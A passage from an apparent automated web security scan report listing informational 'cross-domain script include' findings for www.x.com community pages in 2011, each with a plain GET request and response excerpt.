Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.72. https://www.x.com/community/ppx/xspaces/digital_goods  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.73. https://www.x.com/community/ppx/xspaces/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.74. https://www.x.com/community/ppx/xspaces/forums  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.75. https://www.x.com/community/ppx/xspaces/gaming  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.76. https://www.x.com/community/ppx/xspaces/identity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.77. https://www.x.com/community/ppx/xspaces/innovate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.78. https://www.x.com/community/ppx/xspaces/introduce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.79. https://www.x.com/community/ppx/xspaces/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.80. https://www.x.com/community/ppx/xspaces/mobile/mecl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.81. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.82. https://www.x.com/community/ppx/xspaces/security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.83. https://www.x.com/community/ppx/xspaces/social  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.84. https://www.x.com/community/ppx/xspaces/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.85. https://www.x.com/community/ppx/xspaces/toolkits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.86. https://www.x.com/community/ppx/xspaces/web_checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.87. https://www.x.com/community/ppx/xspaces/web_checkout/nvp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
